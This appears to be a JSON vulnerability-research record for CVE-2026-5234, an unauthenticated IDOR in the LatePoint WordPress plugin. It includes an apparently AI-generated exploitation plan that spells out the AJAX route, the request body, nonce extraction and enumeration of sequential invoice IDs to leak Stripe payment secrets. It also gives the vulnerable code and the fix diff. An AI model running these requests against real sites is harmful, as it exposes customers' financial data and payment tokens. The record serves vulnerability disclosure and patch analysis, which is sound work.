[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fd_0Xz1hjyXIpVCIxOdKbH0dRfDYhQlKCREg86zfux7Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5234","latepoint-insecure-direct-object-reference-to-unauthenticated-sensitive-financial-data-exposure-via-sequential-invoice-i","LatePoint \u003C= 5.3.2 - Insecure Direct Object Reference to Unauthenticated Sensitive Financial Data Exposure via Sequential Invoice ID","The LatePoint plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.3.2. The vulnerability exists because the OsStripeConnectController::create_payment_intent_for_transaction action is registered as a public action (no authentication required) and loads invoices by sequential integer invoice_id without any access_key or ownership verification. This is in contrast to other invoice-related actions (view_by_key, payment_form, summary_before_payment) in OsInvoicesController which properly require a cryptographic UUID access_key. This makes it possible for unauthenticated attackers to enumerate valid invoice IDs via an error message oracle, create unauthorized transaction intent records in the database containing sensitive financial data (invoice_id, order_id, customer_id, charge_amount), and on sites with Stripe Connect configured, the response also leaks Stripe payment_intent_client_secret tokens, transaction_intent_key values, and payment amounts for any invoice.","latepoint",null,"\u003C=5.3.2","5.4.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-04-16 15:19:09","2026-04-17 03:36:44",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fafec4c8c-a18d-4907-8879-2412f8a1abed?source=api-prod",1,[22,23,24,25,26,27,28,29],"latepoint.php","lib\u002Fassets\u002Fjavascripts\u002Fadmin.js","lib\u002Fassets\u002Fstylesheets\u002Fadmin\u002F_wizard.scss","lib\u002Fcontrollers\u002Fcustomer_cabinet_controller.php","lib\u002Fcontrollers\u002Fpro_controller.php","lib\u002Fcontrollers\u002Fstripe_connect_controller.php","lib\u002Fcontrollers\u002Fwizard_controller.php","lib\u002Fhelpers\u002Fanalytics_helper.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-5234 (LatePoint IDOR)\n\n## 1. Vulnerability Summary\nThe LatePoint plugin (\u003C= 5.3.2) contains an Insecure Direct Object Reference (IDOR) vulnerability in the `OsStripeConnectController::create_payment_intent_for_transaction` method. This action is registered as public (unauthenticated) but fails to implement any authorization checks or cryptographic key verification when loading an invoice by its sequential integer `invoice_id`. An attacker can iterate through invoice IDs to create transaction intents, leak Stripe client secrets (if configured), and obtain `transaction_intent_key` values which grant further access to financial details.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** `latepoint_route_call` (The general AJAX dispatcher for LatePoint)\n- **Route Name:** `stripe_connect__create_payment_intent_for_transaction` (Derived from controller `OsStripeConnectController` and method `create_payment_intent_for_transaction`)\n- **Vulnerable Parameter:** `params[invoice_id]` (sequential integer)\n- **Authentication:** Unauthenticated (`public` access level in controller)\n- **Preconditions:** The LatePoint plugin must be active. Exploitation of the Stripe-specific leak requires Stripe Connect to be configured, but the IDOR and Oracle aspects exist regardless.\n\n## 3. Code Flow\n1. **Entry Point:** A request is sent to `admin-ajax.php` with `action=latepoint_route_call`.\n2. **Routing:** The `OsController` dispatcher (referenced in `admin.js` as `latepoint_helper.route_action`) identifies the route `stripe_connect__create_payment_intent_for_transaction`.\n3. **Authorization:** In `lib\u002Fcontrollers\u002Fstripe_connect_controller.php`, the `__construct` method registers the action as public:\n ```php\n $this->action_access['public'] = array_merge( $this->action_access['public'], [ ..., 'create_payment_intent_for_transaction', ... ] );\n ```\n4. **Processing:** The method `create_payment_intent_for_transaction` is called.\n5. **IDOR Sink:** The code takes `invoice_id` directly from params and instantiates the model without owner verification:\n ```php\n $invoice = new OsInvoiceModel( $this->params['invoice_id'] );\n $transaction_intent = OsTransactionIntentHelper::create_or_update_transaction_intent( $invoice, $this->params );\n ```\n6. **Leak:** If successful, the response includes `transaction_intent_key` and potentially `payment_intent_secret`.\n\n## 4. Nonce Acquisition Strategy\nLatePoint typically requires a nonce for its AJAX dispatcher (`latepoint_route_call`). This nonce is usually localized into the `latepoint_helper` JavaScript object.\n\n### Discovery Steps:\n1. **Identify Script Localization:** The plugin localizes data in its main initialization.\n2. **Create Trigger Page:** Create a page containing a LatePoint booking shortcode to ensure scripts are enqueued.\n - **Shortcode:** `[latepoint_book_button]` or `[latepoint_booking_form]`\n3. **Browser Extraction:**\n - Use `browser_navigate` to visit the page.\n - Use `browser_eval` to extract the nonce: `window.latepoint_helper?.nonce` or `window.latepoint_helper?.route_nonce`.\n\n## 5. Exploitation Strategy\nThe goal is to enumerate `invoice_id` values and receive success responses indicating valid invoices.\n\n### Step-by-Step Plan:\n1. **Nonce Extraction:** Obtain the `latepoint_helper.nonce` using the strategy in Section 4.\n2. **Attack Request:** Send a POST request to `admin-ajax.php`.\n - **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n - **Body (URL-encoded):**\n ```\n action=latepoint_route_call\n &route_name=stripe_connect__create_payment_intent_for_transaction\n ¶ms[invoice_id]=1\n &return_format=json\n &_wpnonce=\u003CNONCE>\n ```\n3. **Response Analysis:**\n - **Success (200 OK):** If `status: \"success\"` is returned, the `invoice_id` is valid.\n - **Data Leaked:** Capture the `transaction_intent_key` and `continue_transaction_intent_url`.\n4. **Enumeration:** Repeat for `invoice_id=2`, `3`, etc.\n\n## 6. Test Data Setup\nTo verify the vulnerability, data must exist in the database:\n1. **Create Customer:** `wp eval \"OsCustomerHelper::create_customer(['first_name' => 'John', 'last_name' => 'Doe', 'email' => 'victim@example.com']);\"`\n2. **Create Invoice:**\n ```bash\n wp eval \"\n \\$invoice = new OsInvoiceModel();\n \\$invoice->set_data(['customer_id' => 1, 'amount' => 100, 'status' => 'pending']);\n \\$invoice->save();\n echo 'Created Invoice ID: ' . \\$invoice->id;\n \"\n ```\n3. **Configure Stripe (Optional\u002FMock):** For full impact (secret leak), Stripe settings must be set in `wp_options` or via `OsSettingsHelper`.\n\n## 7. Expected Results\nA successful exploit will return a JSON object:\n```json\n{\n \"status\": \"success\",\n \"continue_transaction_intent_url\": \"http:\u002F\u002Ftarget\u002Flatepoint\u002Fcontinue-intent\u002FTOKEN\",\n \"payment_intent_id\": \"pi_...\",\n \"payment_intent_secret\": \"pi_..._secret_...\",\n \"transaction_intent_key\": \"TRANS_TOKEN\"\n}\n```\nIf the ID does not exist, it will likely return an error message or a blank model error, acting as an **Oracle** for valid invoice IDs.\n\n## 8. Verification Steps\n1. **Check Transaction Intents:** Use WP-CLI to see if a new intent was created for the target invoice:\n ```bash\n wp db query \"SELECT * FROM wp_latepoint_transaction_intents ORDER BY id DESC LIMIT 1;\"\n ```\n2. **Verify Leak:** Confirm the `transaction_intent_key` in the DB matches the one returned in the AJAX response.\n\n## 9. Alternative Approaches\nIf `stripe_connect__create_payment_intent_for_transaction` is blocked by server-side config (e.g., Stripe not enabled), the **Oracle** still exists because `OsInvoiceModel` is instantiated. Check for generic error messages like \"Stripe connect account ID not set\" vs \"Invalid Invoice\" to determine existence.\n\n**Note on Identifier Precision:**\n- Controller Action: `stripe_connect__create_payment_intent_for_transaction`\n- JS Helper: `latepoint_helper`\n- Nonce Key: `nonce` (local to `latepoint_helper`)\n- Parameter: `params[invoice_id]` (found in `OsStripeConnectController::create_payment_intent_for_transaction`)","The LatePoint plugin for WordPress is vulnerable to an unauthenticated Insecure Direct Object Reference (IDOR) via the stripe_connect__create_payment_intent_for_transaction route. Attackers can iterate through sequential invoice IDs to generate transaction records and leak sensitive financial data, including Stripe payment intent client secrets and transaction tokens.","\u002F\u002F lib\u002Fcontrollers\u002Fstripe_connect_controller.php line 24\n$this->action_access['public'] = array_merge( $this->action_access['public'], [ 'webhook', 'create_payment_intent_for_transaction', 'create_payment_intent' ] );\n\n---\n\n\u002F\u002F lib\u002Fcontrollers\u002Fstripe_connect_controller.php line 30\npublic function create_payment_intent_for_transaction() {\n if ( ! filter_var( $this->params['invoice_id'], FILTER_VALIDATE_INT ) ) {\n exit();\n }\n try {\n \u002F\u002F Vulnerability: Loading an invoice by sequential ID without verifying ownership or a cryptographic access key\n $invoice = new OsInvoiceModel( $this->params['invoice_id'] );\n\n $transaction_intent = OsTransactionIntentHelper::create_or_update_transaction_intent( $invoice, $this->params );","--- a\u002Flib\u002Fcontrollers\u002Fstripe_connect_controller.php\n+++ b\u002Flib\u002Fcontrollers\u002Fstripe_connect_controller.php\n@@ -28,9 +28,11 @@\n \t\t}\n \n \t\tpublic function create_payment_intent_for_transaction() {\n-\t\t\tif ( ! filter_var( $this->params['invoice_id'], FILTER_VALIDATE_INT ) ) {\n+\t\t\tif ( empty( $this->params['invoice_key'] ) ) {\n \t\t\t\texit();\n \t\t\t}\n \t\t\ttry {\n-\n-\t\t\t\t$invoice = new OsInvoiceModel( $this->params['invoice_id'] );\n+\t\t\t\t$invoice = new OsInvoiceModel();\n+\t\t\t\t$invoice = $invoice->where(['access_key' => $this->params['invoice_key']])->set_limit(1)->find();\n+\t\t\t\tif ( ! $invoice->id ) throw new Exception( __( 'Invalid Invoice', 'latepoint' ) );\n \n \t\t\t\t$transaction_intent = OsTransactionIntentHelper::create_or_update_transaction_intent( $invoice, $this->params );","The exploit involves unauthenticated interaction with the LatePoint AJAX dispatcher. An attacker first obtains a valid AJAX nonce, typically localized in the 'latepoint_helper' JavaScript object on any page displaying a booking form. Using this nonce, the attacker sends a POST request to wp-admin\u002Fadmin-ajax.php with the action 'latepoint_route_call' and the route_name 'stripe_connect__create_payment_intent_for_transaction'. By providing a sequential integer in the 'params[invoice_id]' parameter, the attacker can iterate through IDs. A successful response confirms the existence of the invoice and returns a JSON object containing the 'transaction_intent_key' and 'payment_intent_secret', allowing the attacker to view or manipulate financial transaction data associated with that invoice.","gemini-3-flash-preview","2026-04-20 20:19:37","2026-04-20 20:20:02",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags"]